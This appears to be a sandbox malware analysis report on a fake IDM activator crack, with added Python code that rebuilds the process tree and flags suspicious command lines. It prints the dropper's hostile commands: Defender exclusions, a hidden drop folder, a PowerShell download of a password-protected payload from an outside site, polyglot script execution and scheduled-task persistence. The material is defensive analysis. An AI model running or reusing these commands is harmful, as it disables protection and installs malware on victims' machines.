Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 16603999968952340 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A (×4)
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A (×2)
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A (×8)
N/A N/A C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe N/A (×3)
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A (×3)
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe N/A (×2)
N/A N/A C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A (×33)
(Consecutive identical rows are collapsed; the parenthesised count is the number of rows the sandbox emitted, in report order.)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe (×3)
PID 3060 wrote to memory of 2812 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe (×4)
PID 2812 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe (×4)
PID 2532 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe (×4)
PID 2532 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe (×4)
PID 2532 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe (×4)
PID 2532 wrote to memory of 344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe (×4)
PID 2532 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe (×4)
PID 2532 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe (×4)
PID 2812 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe (×4)
PID 2812 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe (×4)
PID 2736 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe (×4)
PID 2736 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe (×4)
PID 2736 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe (×4)
PID 2736 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe (×4)
PID 1980 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe (×4)
PID 2736 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
(Consecutive identical rows are collapsed; the parenthesised count is the number of rows the sandbox emitted.)

Read as a lineage rather than as injection: every Target in this table is a child the Process column launched, matching the Processes list below (cmd.exe opens the archive in 7zFM.exe, 7-Zip runs the extracted dropper from its Temp folder, the dropper runs main.bat and then IDM0.bat/IDM.bat through cmd.exe, and those cmd.exe instances drive attrib.exe, 7za.exe, reg.exe and find.exe). The repeated rows are repeated writes into the same freshly created child; no write into a process outside this chain is recorded.
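The parent/child pairs in that table are enough to rebuild the process tree and to ask lineage questions of it (which dropped binary spawned a shell, what the full ancestry of a given tool is). The Python below is an added example for doing that and is not part of the sandbox output; the WPM_ROWS text is copied from the table above, the parsing logic and the Temp-directory heuristic are my own, and the only assumption is the row layout the report uses ("PID a wrote to memory of b N/A <parent image> <child image>").

```python
import re
from collections import defaultdict

# Rows copied from the "Suspicious use of WriteProcessMemory" table above,
# one line per distinct parent/child pair (the sandbox repeats most rows).
WPM_ROWS = r"""
PID 2956 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 3060 wrote to memory of 2812 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe
PID 2812 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2532 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2464 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 344 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2532 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe
PID 2812 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2736 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 1928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1980 wrote to memory of 1848 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
"""

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+)$")
# A space immediately followed by a drive-letter path is the only safe place to
# split two Windows paths that may themselves contain spaces.
PATH_SPLIT_RE = re.compile(r"\s(?=[A-Za-z]:\\)")
TEMP_MARKER = "\\AppData\\Local\\Temp\\"  # heuristic: user-writable drop location


def parse_rows(text):
    """Return distinct (parent_pid, child_pid, parent_image, child_image) tuples."""
    edges, seen = [], set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        parent, child = int(m.group(1)), int(m.group(2))
        parts = PATH_SPLIT_RE.split(m.group(3), maxsplit=1)
        child_image = parts[1] if len(parts) > 1 else "N/A"
        if (parent, child) not in seen:        # the report repeats most pairs
            seen.add((parent, child))
            edges.append((parent, child, parts[0], child_image))
    return edges


def build_tree(edges):
    """Map parent pid -> child pids (in report order) and pid -> image path."""
    children, images = defaultdict(list), {}
    for parent, child, parent_image, child_image in edges:
        children[parent].append(child)
        images.setdefault(parent, parent_image)
        images[child] = child_image
    return children, images


def roots(edges):
    """PIDs that write to others but are never written to: the tree roots."""
    return sorted({e[0] for e in edges} - {e[1] for e in edges})


def ancestry(edges, pid):
    """Chain of pids from the root down to `pid`."""
    parent_of = {child: parent for parent, child, _, _ in edges}
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return chain[::-1]


def render(children, images, pid, depth=0):
    """Indented text tree, one line per process, image basename only."""
    name = images.get(pid, "?").rsplit("\\", 1)[-1]
    lines = [f"{'  ' * depth}{pid}  {name}"]
    for child in children.get(pid, []):
        lines.extend(render(children, images, child, depth + 1))
    return lines


def dropped_binaries_spawning_shells(edges):
    """PIDs of images under the user's Temp directory that launched cmd.exe."""
    children, images = build_tree(edges)
    flagged = []
    for pid, image in images.items():
        if TEMP_MARKER.lower() not in image.lower():
            continue
        if any(images[c].lower().endswith("\\cmd.exe") for c in children.get(pid, [])):
            flagged.append(pid)
    return sorted(flagged)


if __name__ == "__main__":
    edges = parse_rows(WPM_ROWS)
    children, images = build_tree(edges)
    for root in roots(edges):
        print("\n".join(render(children, images, root)))
    print("dropped binaries that spawned a shell:", dropped_binaries_spawning_shells(edges))
```

The parser drops duplicate pairs itself, so the full table can be pasted in unchanged. On these rows the single root is 2956 (the cmd.exe that opened the archive), and the one Temp-resident image that spawned a shell is 2812, the extracted "IDM 6.xx Activator or Resetter v3.3.exe".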

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A (×4)
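The Processes list that follows is where the verdict actually comes from: the batch script adds Microsoft Defender exclusions for its drop folder and its tools, hides that folder with attrib +S +H, downloads a password-protected 7z from crackingcity.com into it, extracts it, imports a scheduled task from XML, launches IDMan.exe through NSudo, and executes PowerShell that it carves out of its own .bat file (the `ReadAllText(...) -split ':PowerShellTest:\s*'; iex ($f[1])` batch/PowerShell polyglot). The Python below is an added example of turning those command lines into triage rules; it is not part of the sandbox report. The sample lines are copied from the Processes list of this page (plus tasklist and mode, kept as benign controls); the rule names, regexes and weights are my own assumptions and not a published scoring scheme.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Command lines copied from the Processes section of this report; tasklist
# and mode are kept so that the rules are seen to ignore ordinary commands.
SAMPLE = r"""
ATTRIB -S +H .
ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"
7za e files.tmp -ptmp@tmp420 -aoa IDM.bat
fltmc
POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force
powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"
POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force
POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force
POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force
POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"
POWERSHELL -Command "(New-Object System.Net.WebClient).DownloadFile('https://www.crackingcity.com/VScan/dlIhost.7z', 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z')"
NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot
7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa
schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f
tasklist /fi "imagename eq idman.exe"
mode 75, 28
"""
SAMPLE_CMDLINES = [line for line in SAMPLE.splitlines() if line.strip()]


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: "re.Pattern"
    weight: int  # illustrative weights chosen for this example


def _rx(p):
    return re.compile(p, re.IGNORECASE)


# Each regex captures the one detail an analyst wants pulled out as an IOC:
# the excluded path/process, the URL, the archive password, the task XML,
# the split label used by the polyglot, the NSudo user mode, the hidden dir.
RULES = [
    Rule("defender_exclusion", _rx(r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+(?:"([^"]*)"|(\S+))'), 5),
    Rule("download_to_disk", _rx(r"""(?:Invoke-WebRequest|DownloadFile|Start-BitsTransfer)\b.*?(https?://[^\s'"),]+)"""), 4),
    Rule("task_from_xml", _rx(r'schtasks(?:\.exe)?\s+/create\b.*/xml\s+"?([^"\s]+)'), 4),
    Rule("polyglot_eval", _rx(r"ReadAllText\(.*?\)\s*-split\s*'([^']+)'.*\biex\b"), 4),
    Rule("nsudo_launch", _rx(r"\bNSudo\S*\s+-U:(\S+)"), 4),
    Rule("protected_archive", _rx(r"\b7za?(?:\.exe)?\s+[ex]\b.*\s-p(\S+)"), 3),
    Rule("hide_directory", _rx(r'^\s*attrib\b.*\+h\b(?:.*"([^"]+)")?'), 2),
    Rule("admin_check_fltmc", _rx(r"^\s*fltmc(?:\.exe)?\s*$"), 1),  # bare fltmc fails unless elevated
]


@dataclass(frozen=True)
class Hit:
    rule: str
    weight: int
    detail: Optional[str]
    cmdline: str


def triage(cmdlines: List[str]) -> List[Hit]:
    """Run every rule over every command line; one Hit per rule match."""
    hits = []
    for line in cmdlines:
        for rule in RULES:
            m = rule.pattern.search(line)
            if m:
                detail = next((g for g in m.groups() if g), None)
                hits.append(Hit(rule.name, rule.weight, detail, line))
    return hits


def score(hits: List[Hit]) -> int:
    return sum(h.weight for h in hits)


def summarize(hits: List[Hit]) -> dict:
    """Group captured details by rule name, preserving command-line order."""
    out = {}
    for h in hits:
        out.setdefault(h.rule, []).append(h.detail)
    return out


if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for rule, details in summarize(found).items():
        print(f"{rule:20s} {details}")
    print("score:", score(found))
```

Run against the sample, the defender_exclusion rule fires four times (the DLL folder and the three tool names), download_to_disk yields the crackingcity.com URL twice (Invoke-WebRequest and the WebClient retry), and protected_archive recovers both archive passwords from the command line, which is what makes the dropped payload recoverable from the sandbox's file capture without the network.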

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe

"C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat" "

C:\Windows\SysWOW64\attrib.exe

ATTRIB -S +H .

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM0.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa IDM.bat

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa AB2EF.exe

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e files.tmp -ptmp@tmp420 -aoa UpdateTask.xml

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM0.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" "

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden"

C:\Windows\SysWOW64\find.exe

FIND /I "1"

C:\Windows\SysWOW64\reg.exe

REG QUERY "HKLM\Hardware\Description\System\CentralProcessor\0"

C:\Windows\SysWOW64\find.exe

FIND /I "x86"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat" r1"

C:\Windows\SysWOW64\attrib.exe

ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\findstr.exe

findstr /v "$" "IDM.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"

C:\Windows\System32\find.exe

find /i "FullLanguage"

C:\Windows\System32\fltMC.exe

fltmc

C:\Windows\System32\reg.exe

reg query HKCU\Console /v QuickEdit

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName"

C:\Windows\System32\find.exe

find /i "computersystem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force

C:\Windows\System32\reg.exe

reg query HKU\\Software

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid" 2>nul

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$explorerProc = Get-Process -Name explorer | Where-Object {$_.SessionId -eq (Get-Process -Id $pid).SessionId} | Select-Object -First 1; $sid = (gwmi -Query ('Select * From Win32_Process Where ProcessID=' + $explorerProc.Id)).GetOwnerSid().Sid; $sid"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "NSudo86x.exe" -Force

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\System32\reg.exe

reg add HKCU\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKCU\IAS_TEST /f

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\IAS_TEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command Add-MpPreference -ExclusionProcess "7za.exe" -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v ExePath

C:\Windows\System32\reg.exe

reg add HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg query HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST

C:\Windows\System32\reg.exe

reg delete HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Classes\Wow6432Node\CLSID\IAS_TEST /f

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Red"' -fore '"white"' '"IDM [Internet Download Manager] is not Installed."'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

POWERSHELL -Command "(New-Object System.Net.WebClient).DownloadFile('https://www.crackingcity.com/VScan/dlIhost.7z', 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z')"

C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe

NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

